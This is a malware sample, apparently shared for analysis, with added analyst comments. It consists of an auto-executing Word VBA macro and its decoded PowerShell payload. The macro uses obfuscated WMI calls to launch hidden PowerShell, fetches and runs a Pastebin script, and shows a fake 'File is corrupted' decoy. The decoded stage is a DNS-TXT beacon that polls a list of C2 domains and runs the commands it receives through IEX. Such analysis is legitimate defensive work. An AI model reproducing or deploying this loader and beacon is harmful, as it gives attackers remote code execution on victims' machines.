- ## uploaded by @JohnLaTwC
- ## 340795d1f2c2bdab1f2382188a7b5c838e0a79d3f059d2db9eb274b0205f6981
- ## macro
- ' Auto-execute entry point: runs as soon as the document is opened and calls Parsing.
- ' Only Parsing is reachable from here; ParsingA below is never referenced.
- Sub Document_Open()
- Parsing
- End Sub
- ' Unreferenced loader variant (Document_Open calls Parsing, not ParsingA).
- ' Same technique as Parsing: the WMI monikers are assembled from concatenated
- ' fragments ("w" & "" & "in" & ...) so the plain strings never appear in the
- ' source, then a hidden PowerShell download cradle is started via Win32_Process.Create.
- Public Function ParsingA() As Variant
- ' ShowWindow = 0 -> the spawned process gets no visible window.
- Const word = 0
- strComputer = "."
- ' Fragments concatenate to the winmgmts: moniker for root\cimv2.
- Set objWMIService = GetObject("w" & "" & "in" & "" & "mgm" & "" & "ts" & "" & ":" & "" & "\" & strComputer & "\r" & "" & "oot\c" & "" & "imv" & "" & "2")
- ' Win32_ProcessStartup instance that carries the hidden-window setting.
- Set objStartup = objWMIService.Get("W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ces" & "" & "sS" & "" & "tar" & "" & "tu" & "" & "p")
- Set objConfig = objStartup.SpawnInstance_
- objConfig.ShowWindow = word
- ' Fragments concatenate to the Win32_Process class moniker.
- Set objProcess = GetObject("wi" & "" & "nmg" & "" & "mts" & "" & ":" & "" & "\" & strComputer & "\" & "" & "r" & "" & "oo" & "" & "t\" & "" & "c" & "" & "im" & "" & "v2:W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ce" & "" & "ss")
- mStr = ""
- ' IoC: WebClient download cradle that fetches and IEX-executes a second stage from the Pastebin raw URL below.
- mStr = mStr & "powershell -C ""IEX (New-Object System.Net.WebClient).DownloadString('http://pastebin.com/raw/sxPYz7fT')"""
- ' Process creation goes through WMI rather than Shell(), so the PowerShell process is not
- ' a direct child of the Word process - relevant for parent/child process-tree detections.
- objProcess.Create mStr, Null, objConfig, intProcessID
- ' Decoy: wipes the document body and shows a fake "corrupted" message to the user.
- Selection.WholeStory
- Selection.Delete Unit:=wdCharacter, Count:=1
- Selection.TypeText Text:="File is corrupted."
- End Function
- ' Live loader called from Document_Open. Builds the WMI monikers from string fragments
- ' (keyword-splitting obfuscation), then launches a hidden PowerShell process whose
- ' -C argument carries the whole implant as a Base64-encoded gzip blob.
- Public Function Parsing() As Variant
- ' ShowWindow = 0 -> the spawned process gets no visible window.
- Const word = 0
- strComputer = "."
- ' Fragments concatenate to winmgmts:\\.\root\cimv2.
- Set objWMIService = GetObject("w" & "" & "in" & "" & "mgm" & "" & "ts" & "" & ":" & "" & "\\" & strComputer & "\r" & "" & "oot\c" & "" & "imv" & "" & "2")
- ' Win32_ProcessStartup instance that carries the hidden-window setting.
- Set objStartup = objWMIService.Get("W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ces" & "" & "sS" & "" & "tar" & "" & "tu" & "" & "p")
- Set objConfig = objStartup.SpawnInstance_
- objConfig.ShowWindow = word
- ' Fragments concatenate to the Win32_Process class moniker.
- Set objProcess = GetObject("wi" & "" & "nmg" & "" & "mts" & "" & ":" & "" & "\\" & strComputer & "\" & "" & "r" & "" & "oo" & "" & "t\" & "" & "c" & "" & "im" & "" & "v2:W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ce" & "" & "ss")
- lStr = ""
- ' Command line: "powershell -ep bypass -C" followed by an inline decoder. The Base64 payload
- ' starts with "H4sI" (the gzip magic bytes), i.e. it is compressed script, not plain text.
- ' The decoded script is reproduced further down the page.
- lStr = lStr & "powershell -ep bypass -C ""$data = [System.Convert]::FromBase64String('H4sIAAAAAAAEAO1da3PayNL+7l+hol"
- lStr = lStr & "J1cG0MJPbuJpvyqXeEwSYxtmWDHRP2dbCQZWxArCSsOHv8309fZnRD4EvYPWsl2dooAmmmp/vpy/TMNCsX07HpD5yxdgZ/ypvd8i"
- lStr = lStr & "b8D//Bv4sv/oS/4Z6+4X+U71ZX/tTwC3yiy5/jW3faprZnBWv751eW6WtHt55vjUqN/VLTGjnu7ZHvWr3RuxWN2+zKnqiZua9Wnd"
- lStr = lStr & "HEtTwPyCttdwYTbqSY1ftL7VP2e7F/N52+9ftvv6lPViU1XW6JSIL/5lLDvZ+4A99yi1nDmNdgid6Zw81571SHjmcV+esyv8QP4C"
- lStr = lStr & "NIYxYXSi1HuG7vlt5zLX/qjkO+VJ3xjeX6wICWo/c865cNGNBgbBez2of371YiaDDdZdkVPAMY+FQd9YeWrw/GfWxl9XftoOeCdF"
- lStr = lStr & "agx2Dgm5e/K2HLRss88ruXs0/Qd2VmSbdMT1BjFrL6wPEGRMamVnmpNXvjfs8HRCELWu7UWv0d26OhcHv0p0x9MrXz23v1kPZUM9"
- lStr = lStr & "0zyZ/57b1+aHtdJfHF7a0/cLxlKR0W0Pz2NlLt1XtDL9EgNhdaAAnUuxVtVaJQ2QcGHaGw+KllffFLtbHpIA4AXu3xAP5tlbYtXy"
- lStr = lStr & "LsU4S9uuuMEuj713uh/yp2muI00G/F9rUwhV4RW474GIgbUQ/gql+I6htxYOgmXj8K/nw34Hv6fKciGkK8FVUhGrYYiC1PbBnig6"
- lStr = lStr & "gawgr0r2K7KUxbn4gdIfpC/CLqb5Ltxu4/CrjC/W4A7XH/1O6BIWxRE9CouBZVW5wEeltst4WF9FY3xKGhT7Gf80C/xnGc2/pY1C"
- lStr = lStr & "ti38b+2ng/ib5vi11b38FrX+gtsWMwfdsbohMIR9Q9YQT6Dd73bX0odhr4XB/5sm/r23gP7fii1hCnBo6vLfZsURH1Jj53G/YPdL"
- lStr = lStr & "4P9IHYMYVhw3O1mjgM9Cu8doS+jte+oeuiZoqmgCu008b7rQq8Jyaiei0+GMJDPn4Q+rmoG6Jj6BtIL9BfR/pOiU5D9Gj8pvhowH"
- lStr = lStr & "iBzmO6vw6/7xhiiv3A+5l0Aj+3xPYbvH+NdAA/KiH/aqd4D+1UcByXiBdo7zUKuR3Ac8AP1T/IZyy2gV+BXsXnDAP4vGXj9UrUa/"
- lStr = lStr & "i+i+M2AuAXXIE+HfnYpGsN5QzyNnHcNP7d5yfvHo3P1n/B65HQj/F6YvP4lLxbeA35ZCB/SO4w/rGUO4w/EO8F03cskC4b9QfkSO"
- lStr = lStr & "O7QnkBjuQ4QnqP8b5nhN8PiV8Bvp8lL8BVjfg0FTuniI9bfE7h6NDG8QEuDKBzuyZMbGfrVOxl8RHkxuOkcdE490U4Tl3stHGcDe"
- lStr = lStr & "KPAXJBvciPvF9Lee9F8m5gv8QH0utagHJS8pZ6kQ95mwl5txnP+ZS3suevpT3v4LUl4PsQ9zbbtec9zo4c5ys5TvJfp7Z+SOOUuO"
- lStr = lStr & "4EcVybLO/tZm5wTX4Z5EnjrDt8zSeue1LeX6S892Scchj5LZv1GuIJwvmzj1MM9r9bNbbHtQpem/g9vL8u7TnFa897nDX0P1Vsj3"
- lStr = lStr & "F7zfEY6+srOU49Hpc+9zgE8L5OfknGW+Sf8h2HDGQc4kp53kTxdV71t4HjAf1tSL9DeO7Jaz5xLf2vwjXHW0a+4y2aN4ovUp6HOY"
- lStr = lStr & "231DhvE/prx/ME+dNf8ktbcj5Uv2b9zbNfshm3VkJ/mzw/zKv+Ujwlvkp5vpd+aZxnXFNcue3F5kO590vr8XxHL/gOcE3zJRHE7X"
- lStr = lStr & "Uyz5c3XDelvT6V+Suy2+y38orrQMYZiXlELc95gCtpr18ncG3kOQ5pSnu9wfLkOORayjWvuF6P8ni2OJLyzLG9vpL2Wq3DufmPrw"
- lStr = lStr & "2eH+8Ittec/8m1ve4IzttaCVw385z3YTsVzY9VfJ3jOMRIrjfU24zrHM8bOzLfsSdi+Q61XyCfuB7KfOaNlGc9//F1m+PrHRVfC5"
- lStr = lStr & "435jgOgfcT64ltI/fzxqHcB7PBcYiga8fIN6478XxIrc3rT/nG9TjK09s4f9IlHx6Ea7j+KgBCVVsf4fM0zh2SK+GwIffJRfvoeL"
- lStr = lStr & "+c2pdH+/R4P9FbeXXkfrz7n6fPw+/fIv8bqGeMz4rYtkXLhnEjLgXyC+gTuod0076/HbX/T/B7cE90Jvf1yXu1/4/7p/1/sf2E8/"
- lStr = lStr & "cnPq69/QBEBSyAdu2QD4p/6r0YH+i92P0F7j/cIroGotqIjY9xZBm6lBe2L7gfoLdD9zaOg+QOeuaI2gbgDz+voFyHcpwxPgqxS7"
- lStr = lStr & "gBvEp6SU9Q/kLfR32F9n3CG9ElEC+x8RFds/RkyCPad6n2dSp+xu5j8vhA8WVbnFB7DaQf7F2AenOD+g34CCT9X3A8rEfXOO6fcR"
- lStr = lStr & "7SQXzBONhOS/kqORLf0/tLY5+rK9Mzi0egBz6/FVsb4j3Gw1Xiiy12EL9sl8/RDuB8APm3k7Z7RHeA+t1H+tjuTeW+VuVnrrC/Ux"
- lStr = lStr & "wX2MOmAPsL/G9Svw3sL7b/NeL7xax8hsg3siNpOe3Mvr8E3Dq47g9+8ZTHg3hrIj9u0K71AsSXYFztEF+HEtcVlJ+J9EI7fcH+Js"
- lStr = lStr & "KRshvp/cHK7sT2CcP1AvkD/Tdt8ZOonoom0gd2A/jxBj8nfgBfOgbbu130p0n7SnoD9Fzi533BdJ7bjEflJ8BeOGSnbfQHAvAmAp"
- lStr = lStr & "ITrq9hf7aY1Q/AVZrvCp+RvmTsf47JAe6j/cpPlReOL0AcBmjvichH4Q/GdxLAeOtpu0e4Az6e8j7qp9kBn/TCYH4DXZNH4jdzP/"
- lStr = lStr & "is3U7yOcavOfyN8TMmp/Q+8wsD/DwQq+IAwNcR4gT0/5r9O/O/ZSC+bOS/T3bZCO34r4/fv36N8RnFIX2MN6DfDwbi8h47kcAjvk"
- lStr = lStr & "92ieRvzciV5WlSnovimgD7gTgok64EX2PyjtmLJ/ntE4x/VFwJfGxjfIh6KzheJPzUKojfDbK76Ne2pX16kjwxXpJxL8dJFeT3Ry"
- lStr = lStr & "Op30n7m4qDlJ2K9aviINXfPL48VG8uhH7A/h/Gn463EzhI62cyjkvIMU33A/TzB26+ATfAH6JvJ4oL0vFLGjezcgN7oOSt9Bvk3Z"
- lStr = lStr & "fz1T7J/w37s20Z97Pdqch5j5RnMr6L6Mj2w1F8H9qr2LkajCNh3oV2j9brndD/Nmh+c434oHjonOaN1/AcXiv4nI/0Aj9+jnDdRj"
- lStr = lStr & "n5KftGuMjE7TxcxeLOFs27TbTXB7i+3rPDOM7Gfi0ZJxA9INcjfA6uPG+neIHoMsn/XPM8j+eDPTmvUPO4IfmD1HwpMy5N8Jfle0"
- lStr = lStr & "Hzc4F+egHfmpwvAP9H/UEcBs8pud/zvb4XzmfD+XjW84CTefxfMI5EPLME/qt5dgf9KcjhWM7jVNz24Ym4+JDSU8J/+pxaIv6MyY"
- lStr = lStr & "nt2lukL0FPWs+WwD/w+1tyfkTzjw9z2p1npyJ7GcNhen78aL3fwDwK5VVNymvUQH6I9+tkvJhh77JxPT9vwv08IC8WH0fajsf8UA"
- lStr = lStr & "wXb+P0KjvdwfMKnAerRHouWF8Ar4w3Nf98SL4iGd/P4iqpJ4/lz+PySkY4/8rE/zOw/5l6ndZTpQesPx9lXFKR+vMk+ewKzpPszs"
- lStr = lStr & "yjld4tsO8c30zpnIvMF1IeJ60v0O454Q/0XaTjoUePu0X5QkN3Ucgwv/NknmeO3ZuJM+ad112C3O/zX3R+huZ3afv/4an8ID/jYX"
- lStr = lStr & "s/y7zNENsDPr0XtTfSzpIeBbK/r/icypfe933LUHnxMH9cIxxnxQ8ZcrdScXpEf3Y8GsXL+j6tOwQY377B/Qh/yH4pP7ZgvKl4Be"
- lStr = lStr & "expHfXnLdS8Uv2fGbe/Jri4gV+Lz0fyfTXaf+UmGcl/XDG/Jn8kxpXh/Jwb6TeGRn+k+UC/HkV5YGicUf9ZMfnig8XUb797T15d4"
- lStr = lStr & "/oCXj9iPFM8rmU60Iyj4B4R//G8eB7mrdXcDzpfFbse3rPj/IRBusZ3NM6hcrDc383pH+pdYzdOflilR9OzP+y9amN+YUY/xWdZO"
- lStr = lStr & "/70g5buP6Vzm+l9TYjz3WRsl/kL3au4/KczcthPs/mPOV5vF8VF6TzxOn5Znr+DvMt0BNPrltl5MmfNK6n6vMD+R36/1vOqyvcPK"
- lStr = lStr & "91sWMjue/sWK738vqgI88B0PrYkTyHF8T3tZzI8y/HIv5+Ozw/n1wnpXiM7EMH88DpOCmdR1kcZ6bXUeiazt8B30a8TiIun4jTh+"
- lStr = lStr & "dTWQ8nlK+ZzfO+nYPr770eR0euvyfqcShccR2KJu+zUedTIJ7LTX0Gud8ieV5f7uvm9fktua/7Su4r+8rr1IzbZ70Poe7I84JtuR"
- lStr = lStr & "/S4/X3jLokJwk7JeuzPO99J534uWbA23GE+5zuO1Hy3rblfgs6330pz7kn69BI/T8XuatD8zUu71zvM1LyDvfP2bk/dxXaqXgdqf"
- lStr = lStr & "p1/Lz/d2DPxXdz/vtEnbNL1JHK9bmNRF2SsJ5Wrs8j/ajXYcp6OznG9Y96Hd+BvU7X6zg2vpd6HUl73RH5xnU7ges3jOscn7NTuO"
- lStr = lStr & "bzSCbvbwd7neNzdrKOhf5z/NwG4C2/82fANeVlt5rJOCTf9prikF68rlC+6/6pepa3iXPROcc11/0TSXud4/NILE+w1zKfGctv5x"
- lStr = lStr & "XXso5Fqn6pkee6Q3IdjeuzKFx3cj1vlHUszu34Obtcx9dX8frDal0033VaZX2WrWZ83Sbv5/25rraMr8+D3NtrWccirJuv6ljkOM"
- lStr = lStr & "8n67Nw/eEovs5xHNJJ1e2kfAivV+QX11xPqyLleSXX4XJsr9ty3VXlr9u5j69VHYueiK/DOXmOQ1QdC0/G14f5nzeq+ix2fH15mH"
- lStr = lStr & "Ncj+P5kEO5Xy/XuN5OrDd2pL1+6LwxvX969hz5Y/fZLWvf3jy6lvj7X08aJ8gPcCvli+djSU7TcP8z12XYo3NKpB+0L9aX+yyfdN"
- lStr = lStr & "70A9oNxhedF6LzXpnn5WPtx/ZxJupRZNeniH4PbWY/p4l+YsJ1Dmb29T72PP3sfv7M81Mz9SCCLDz87+uWzD2nnBr3vPN9M+ec0v"
- lStr = lStr & "uzH1s3R9aV4H37p9KeqnPJcD/h8yVLO0c9kHyd5TvXMZl/jjyz3kvWPuB76o8srh8ze+4os97HjB5G9ixRD2Nx3Rfehyfrryw+Zz"
- lStr = lStr & "FdXn2JRliPpBUwfgHXab+Tic/ZOi/fwC+ur/QEPtP5TsaFPNe5QM+dJ+tTlc7/fXmO5xBOVbwu90H34/tN0v78CfrB5+ZqHG9yPR"
- lStr = lStr & "dPnudT9ZG+RufLNvhckOLjA+og9GQcHKuD8BX3NTfRri/wl3sGEM31YuaMi6+Krr6UG9UDepx9oToWUX2Gb8XX3PNTT5JP7JxGRh"
- lStr = lStr & "0p4t8U5cPnhWj8HtpL5n8Nn6vNtdMx/3gfnxf7udm6CYnznelzLOp8Xiz+SNQtWlinia9c38wIzz2yfSX8/cX2NkMOC/g2z86qcz"
- lStr = lStr & "Hnst5Xdtx0Pz4y44yM88LpOGsJccYDzgFuLC9utxfwMaMeVmZcnK5/kj7/GjvHm3kuNHGuLn1eKsQ5vXeB/dfeME7QPqb8xAJ5Z9"
- lStr = lStr & "a9egTdUdzKdXVIzw05T/mGeUKs3dk6NvPOzcbqjSzFvsziJSNuVXoQk+ORoddF3X4yHhbgKzVvTp/TT57PT9arnF8f7AH8/HZ9eA"
- lStr = lStr & "Qf728vbTfT89xUXZRAuPfEJek4pLXkOOQVxhfq+4x6Tety3veg85QL+b7U+JXjxHOsuzeTF5oTP8+dl5O9GUR1D7ysvMIcP5aMpx"
- lStr = lStr & "LfQ/x7Sv6xCfPpeJ2WxHn4xPsdGSedyvjFMpLvzeN7R8oN/HlmPSx1pffE5ua/Vlflz9Tzr9Pzn26Zf6beGt/8NnEd2+2N+j2/99"
- lStr = lStr & "O3/2496MFHKR+KS/oYh8ToODsjKrpMT7fcJTq+udteoMpN8vS5GWA5SVILYm+cDWXZcxmJ+Gu779uItmbYPfR7RiM/kxfsvpAlnc"
- lStr = lStr & "+/ZRFbWNEGF0Vshx7Db8vc2J22Zv2hvWi5Uwt6+pP7KnflX/g09zV07IHJcsD3uF1q7E6T7W5yo9R29Ck1pYi5ky3wB3JUm/xpmS"
- lStr = lStr & "nrnklRI9H0eVc+yd8iNXtWsLZ/fmWZvnZkmVN34N+WDoCj5mDSG5ZOBuO+E3jhB0Xt0/ynGn1r7MM3IB6QWXXqunBfXF3VFMdm+i"
- lStr = lStr & "81vMb40BlaxQXN6tPB0OfHoGXRHw3GA893e77jrjLH/QTHiafMurPyksB1JPRdLHHTwil1nabaIyqxGnDKpYMmlE3+lUypf6WpOy"
- lStr = lStr & "2pBFhKaxK6iB06wmGiyerTVL3BJTygvWOZoo+VjNmMA1dKOwLucx4aep0GV/erK/Nwt6JZQ8/6G4TZFMdLG/HfJKRlkvyNQiKLJK"
- lStr = lStr & "0O/08j/WSGg2g5jbG//rr4ovji4OjYcr2BM271zodWKbwtNXtXjvuf/am/xgNdLbXcwaiIfSgbm+5jzfa116TsnqmtHfT8y2zPun"
- lStr = lStr & "bcG04t+o5MtLLjaCKxN6s3ynaFK1rvYQ1nGPdFDaexLY106AMIKFnU/qQVPo8LcMnqciV850yqipSEdA2hJyhvFrM6BU6iB2j41u"
- lStr = lStr & "jAdSYguttw8Bnqt7bXG1nateWOreH6a3hSvtO6nVgayzDN+QRdaxeOa1oKQd+BP4pJkiV7t/kXhToQwB/avHCmCkiitr5bCWOKbh"
- lStr = lStr & "Qr/JVUqOmSGfC0htLRMvwEauxgNAB0WjcgjDpw0nK1tTGgypv0TEtzHcfvetNzz3QHEx9shPYf7dAaOTfW2slowMCQbVSd0ag37u"
- lStr = lStr & "8OxlYNGwNavekIm9t7SnNnZxdEje+YsqFzkDcB+rHtMcOlyToLPdeR5eNTjbHn98bQ2BqMYDKFLnH4PBGo7jcP2q3a4Z5o1uL9fr"
- lStr = lStr & "u0TFkkCrBh0mKRwWFxIkmmikJKaQGFw57nAWtqcWkJ1wb2jH1P+78/yR5sZgL9nUZvRYNYhiNMDAMc2BHm8uunWLueAaYZU8u93e"
- lStr = lStr & "2N7WnPXk6fx7Rvh52fbH8p7bZT9fxhfvmHnJfehvXWeV7+XipUReY9r2gfWRDWk4xEV2vzPg9et+f1dJk35vyoQEWl/Eaffgegzf"
- lStr = lStr & "W1qiJcP+zIdaYjg38HgT7nfUdDuT7wFeloUJ0Bk9vdaoIM9Avk0zn+LigHD63ZusIm8TF0XNKhsaei6VHhIc5fudiumkDBM89ax+"
- lStr = lStr & "Zbs0x1m7XooG5fwGf5GGKRA18GRI0A48058WO6tDFDwAwhwan5deRAW75HvqCOKRqG/jlxin7qYoqpr48Cf9qBUhYqDnXkkoVHuQ"
- lStr = lStr & "RKvbSlKsZ41rJGk2HPR+YUqr91pavuHt16ENmsv1YfHDiB5R5dWsNh9+ZVqdKd4L2H9yXrC6CFHzvyb4eWtjPoQwAB8tE+Fxq1j9"
- lStr = lStr & "rnF0XgGgBq7IM0FoaIC8LAeLT7uVAAPZirCEvs1IFOPe60sKLJ2EvpD9nreI/24gB4UfT8/6nxcWflxPA40PvEsiktQKh+61teMY"
- lStr = lStr & "vYVck2Di8lGXIKUo1NQRJoziIEG/LMS7/nXXsEgXJdK5swPoBS2R9HoW7Zd7XCQ+BiZRJW0MowX3HGgz48Wh5o65XEfCByoCpg55"
- lStr = lStr & "Ch8PlFP8arBapKMHlgGL9aUsNafff5xchLhd3cV2O/1ITIxr1lcdODpRMIia0iEPVSq7wEqPRLu9bY9i+5ndKRZV0XKy8rqxAWIQ"
- lStr = lStr & "72psMhfGPO7QGts2t5NBnc7gwm3FcRG3sZjjr1XOzfTQAKMGPLMuVnSIfnzuuNWz+0en3LLSJZ+LgPT+NLJfiu7zvWuF9cfceK4B"
- lStr = lStr & "eUdsYYKHXlEfCdlSyi7vHTroOe69875ZoBkZpy3WdmHgcgpCU0JT/88A8//Pf44SwMSy/6cCv+99GVbfSfrW6cnfEUsOUordDVFD"
- lStr = lStr & "muHHKeuJk5D0a0SI3azDQed+A7MFwZg++ILbXI9RD57N0q+Ew0XFmMf0dcjnnXB00n5hvHZYd9aDax3YI56gNMAT6WeekgLDTn/I"
- lStr = lStr & "rQB11XCb7sw4qfC58LJ5x0KBEc8YNV7d+Z61kcdmX0oFovudOxhi1E8J4Ty5AlA0c7cYYD81Y7v50gDgDy2YD/XHhZ0f69iKrFXi"
- lStr = lStr & "+ZOH9EsrEQMHMyey5EPvDbjITshF7O7uhHkPcjyPvHBnlPDfF+2Krvx1bN97cko4Wkv7tLO95/1g4IGkHmEtvncSap8M7d3UrYsY"
- lStr = lStr & "z1y90lhGF9Csg5F/rPay7cySw4q76MuDPgHysxVZNrsxto+LMk8v4a9tNPM2/Rkdp1mRr38Kc2dvEnFRQfCzc3hSX0RcdwY8faLL"
- ' Inline decoder: MemoryStream -> GZipStream(Decompress) -> StreamReader -> IEX of the plaintext.
- lStr = lStr & "rH9Pv/nrn/BcWzSyNlqQAA');$ms=New-Object System.IO.MemoryStream;$ms.Write($data,0,$data.Length);$ms.S"
- lStr = lStr & "eek(0,0)|Out-Null;$cs = New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.Compr"
- lStr = lStr & "essionMode]::Decompress);$sr=New-Object System.IO.StreamReader($cs);$t=$sr.readtoend();IEX $t;"""
- lStr = lStr & ""
- ' Launched through WMI Win32_Process.Create, so the PowerShell process is not a direct
- ' child of Word - relevant for parent/child process-tree detections.
- objProcess.Create lStr, Null, objConfig, intProcessID
- End Function
- ## decoded with https://github.com/JohnLaTwC/PyPowerShellXray to:
- # Decoder output: the command line built into lStr above, with the Base64/gzip payload
- # shown decoded in place below (the decoder inlines decoded content where the blob was).
- powershell -ep bypass -C "$data = [System.Convert]::FromBase64String('
- # gzip + Base64 encoder (obfuscated identifier). Used further down to pack the implant
- # text into a registry value on hosts where the NTFS-stream write path is not taken.
- function ____/=\/==\/\/\_/=(${_/===\___/====\__/})
- { ${_/\_/=\_/=====\/=} = New-Object System.IO.MemoryStream;
- # Compress the input string through a GZipStream into the MemoryStream.
- ${_/==\/=\/==\_/\_/} = New-Object System.IO.Compression.GZipStream(${_/\_/=\_/=====\/=}, [System.IO.Compression.CompressionMode]::Compress);
- ${_/\/=\_/=\/=\/\/\} = New-Object System.IO.StreamWriter(${_/==\/=\/==\_/\_/});
- ${_/\/=\_/=\/=\/\/\}.Write(${_/===\___/====\__/});
- ${_/\/=\_/=\/=\/\/\}.Close();
- ${/=\___/\_/=\/\/=\} = ${_/\_/=\_/=====\/=}.ToArray();
- # Return the compressed bytes as Base64 text.
- return [System.Convert]::ToBase64String(${/=\___/\_/=\/\/=\});
- }
- # Installer / launcher for the DNS-TXT beacon. Parameters, in the order they are
- # forwarded to `logic` below: two switches (persist-to-disk, run-now), then
- # startdomain, cmdstring, commanddomain, stopstring and an optional AuthNS name server.
- function _/===\_/\_/====\/\
- { [CmdletBinding()] Param(
- # Switch 1: when set, write the implant to disk/registry and register persistence;
- # when clear, the implant is executed in-memory only (see the final else-branch).
- [Switch]
- ${_/===\/\/=\/\___/=},
- # Switch 2: when set, also start the beacon immediately after installing persistence.
- [Switch]
- ${_/==\/\__/==\__/\/},
- # Position 0 -> startdomain (TXT label polled for state).
- [Parameter(Position = 0, Mandatory = $True)]
- [String]
- ${______/\/\/=====\/},
- # Position 1 -> cmdstring (TXT value that means "a command is waiting").
- [Parameter(Position = 1, Mandatory = $True)]
- [String]
- ${_/=====\/\__/=\/\/},
- # Position 2 -> commanddomain (TXT label whose record body is executed via IEX).
- [Parameter(Position = 2, Mandatory = $True)]
- [String]
- ${_/===\_/\/=\_/\/\/},
- # Position 3 -> stopstring (TXT value that ends the loop).
- [Parameter(Position = 3, Mandatory = $True)]
- [String]
- ${____/=\_/\_/\_/===},
- # Position 4 -> optional AuthNS, passed to nslookup as the server to query.
- [Parameter(Position = 4, Mandatory = $False)]
- [String]${__/==\/\/\____/===}
- )
- # The beacon body ("stage") is a Unicode/Base64 string literal; the decoder has inlined
- # its decoded text here. At runtime this variable holds the stage as plain script text.
- ${/=\/=\/==\/=\_/==} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('${script:_/\__/=\/\/\/\/=\} = "";
- # IoC: fallback C2 domain pool (script scope). A random entry is chosen whenever a lookup fails or returns nothing.
- ${script:___/=\___/\__/=\_} = @($('olgw.my')),$('oloqd.pw')),$('dsud.com')),$('dpoo.pw')),$('dosdkd.mo')),$('dlox.pw')),$('oof.pw')),$('cnkmoh.pw')),$('dtxf.pw')),$('gjcu.pw')),$('wuc.pw')),$('ihrs.pw')),$('kjko.pw')),$('ldzp.pw')),$('lvxf.pw')),$('mjot.pw')),$('mut.pw')),$('mvzo.pw')),$('mxfg.pw')),$('nroq.pw')),$('nwrr.pw')),$('odwf.pw')),$('okiq.pw')),$('otzd.pw')),$('qznm.pw')),$('rnkj.pw')),$('rzzc.pw')),$('sgvt.pw')),$('soru.pw')),$('swio.pw')),$('tijm.pw')),$('tsrs.pw')),$('turp.pw')),$('vpuo.pw')),$('vxwy.pw')),$('xhqd.pw')),$('yomd.pw')),$('yodq.pw')),$('yqox.pw')),$('zdqp.pw')),$('zjvz.pw')));
- # DNS TXT resolver: shells out to `nslookup -querytype=txt <name> [server]` and keeps the
- # quoted record text (char 0x22 = '"'). Detection cue: nslookup spawned by powershell.exe
- # with -querytype=txt at a regular cadence.
- function ____/==\/\/\/=====(${_/==\/\/\/===\/=\/}, $AuthNS=$null)
- {
- ${___/=\___/\__/=\_} = ${script:___/=\___/\__/=\_};
- ${_____/\/\/=\_/\/=} = ""
- try{
- if ($AuthNS -ne $null -AND $AuthNS -ne 0)
- {
- ${_____/\/\/=\_/\/=} = (IEX "nslookup -querytype=txt ${_/==\/\/\/===\/=\/} $AuthNS" 2>&1 ) | select-string -pattern "$([char]0x0022)";
- }
- else
- {
- ${_____/\/\/=\_/\/=} = (IEX "nslookup -querytype=txt ${_/==\/\/\/===\/=\/}" 2>&1 ) | select-string -pattern "$([char]0x0022)";
- }
- ${_____/\/\/=\_/\/=} = ${_____/\/\/=\_/\/=} -split("$([char]0x0022)")[0];
- # Empty answer -> rotate to a random domain from the pool.
- if(${_____/\/\/=\_/\/=} -eq "")
- {
- ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
- }
- }
- # Any error (e.g. NXDOMAIN, nslookup missing) also rotates the domain.
- catch{
- ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
- }
- ${_/====\__/===\__/} = ${_____/\/\/=\_/\/=}|Out-String;
- if(${_/====\__/===\__/} -eq "")
- {
- ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
- }
- return ${_/====\__/===\__/};
- }
- # gzip+Base64 helper; not referenced elsewhere in the visible stage.
- function enc($txt)
- {
- ${_/\/\/\/==\/==\__} = New-Object System.IO.MemoryStream;
- ${/===\__/\/\/\/\/=} = New-Object System.IO.Compression.GZipStream(${_/\/\/\/==\/==\__}, [System.IO.Compression.CompressionMode]::Compress);
- ${/=\/\/==\/===\_/\} = New-Object System.IO.StreamWriter(${/===\__/\/\/\/\/=});
- ${/=\/\/==\/===\_/\}.Write($txt);
- ${/=\/\/==\/===\_/\}.Close();
- ${_/\__/=\_/\___/\/} = ${_/\/\/\/==\/==\__}.ToArray();
- return [System.Convert]::ToBase64String(${_/\__/=\_/\___/\/});
- }
- # Base64+gunzip helper (inverse of enc); not referenced elsewhere in the visible stage.
- function dec($txt)
- {
- ${___/\_/\/\/==\/=\} = [System.Convert]::FromBase64String($txt);
- ${_/\/\/\/==\/==\__} = New-Object System.IO.MemoryStream;
- ${_/\/\/\/==\/==\__}.Write(${___/\_/\/\/==\/=\}, 0, ${___/\_/\/\/==\/=\}.Length);
- $null = ${_/\/\/\/==\/==\__}.Seek(0,0);
- ${/===\__/\/\/\/\/=} = New-Object System.IO.Compression.GZipStream(${_/\/\/\/==\/==\__}, [System.IO.Compression.CompressionMode]::Decompress);
- ${/======\_/=\___/\} = New-Object System.IO.StreamReader(${/===\__/\/\/\/\/=});
- ${/=\_/=====\__/\/\} = ${/======\_/=\___/\}.readtoend();
- return ${/=\_/=====\__/\/\};
- }
- # Main beacon loop. Polls "<startdomain>.<domain>" TXT; on cmdstring it fetches
- # "<commanddomain>.<domain>" TXT and executes the record body with IEX.
- function logic($startdomain, $cmdstring, $commanddomain, $stopstring, $AuthNS)
- {
- [System.Threading.Mutex]${____/==\__/\/=\_/};
- try
- {
- [bool]${_/\_/===\/\___/\/} = $false;
- # IoC: single-instance guard via a named mutex 'SourceFireSux'; a second copy exits.
- ${____/==\__/\/=\_/} = New-Object System.Threading.Mutex($true, $('SourceFireSux')), [ref] ${_/\_/===\/\___/\/});
- if (!${_/\_/===\/\___/\/})
- {
- exit;
- }
- # IoC: the domain pool is redefined here with a slightly different list (e.g. algew.me, dyiud.com).
